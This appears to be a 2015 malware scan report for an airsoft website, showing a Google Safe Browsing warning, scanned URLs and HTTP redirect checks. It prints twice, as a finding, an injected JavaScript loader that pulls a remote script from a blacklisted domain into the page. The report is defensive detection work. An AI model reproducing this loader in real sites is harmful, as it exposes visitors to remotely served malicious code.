Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=centraloregonairsoft.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://centraloregonairsoft.com/ | 200 OK Content-Length: 16489 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: highdesertairsoft.com (function() { var bsl=document.createElement('script'); bsl.type='text/javascript';bsl.async=true;bsl.src='http://highdesertairsoft.com/wp-content/uploads/it-file-cache/builder-core/script.js?ver=6'; var se=document.getElementsByTagName('script')[0];se.parentNode.insertBefore(bsl,se); })(); | ||
http://highdesertairsoft.com/wp-includes/js/jquery/jquery.js?ver=1.7.2 | 200 OK Content-Length: 94861 Content-Type: application/javascript | clean |
http://highdesertairsoft.com/wp-content/plugins/fancybox-for-wordpress/fancybox/jquery.fancybox.js?ver=1.3.4 | 200 OK Content-Length: 15667 Content-Type: application/javascript | clean |
http://centraloregonairsoft.com/test404page.js | 404 Not Found Content-Length: 13337 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: highdesertairsoft.com (function() { var bsl=document.createElement('script'); bsl.type='text/javascript';bsl.async=true;bsl.src='http://highdesertairsoft.com/wp-content/uploads/it-file-cache/builder-core/script.js?ver=6'; var se=document.getElementsByTagName('script')[0];se.parentNode.insertBefore(bsl,se); })(); |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: centraloregonairsoft.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 Mar 2015 03:26:14 GMT
Server: nginx/1.6.2
Content-Type: text/html; charset=UTF-8
X-Pingback: http://highdesertairsoft.com/xmlrpc.php
GET / HTTP/1.1
Host: centraloregonairsoft.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 Mar 2015 03:26:14 GMT
Server: nginx/1.6.2
Content-Type: text/html; charset=UTF-8
X-Pingback: http://highdesertairsoft.com/xmlrpc.php
Second query (visit from search engine):
GET / HTTP/1.1
Host: centraloregonairsoft.com
Referer: http://www.google.com/search?q=centraloregonairsoft.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: centraloregonairsoft.com
Referer: http://www.google.com/search?q=centraloregonairsoft.com
Result:
The result is similar to the first query. There are no suspicious redirects found.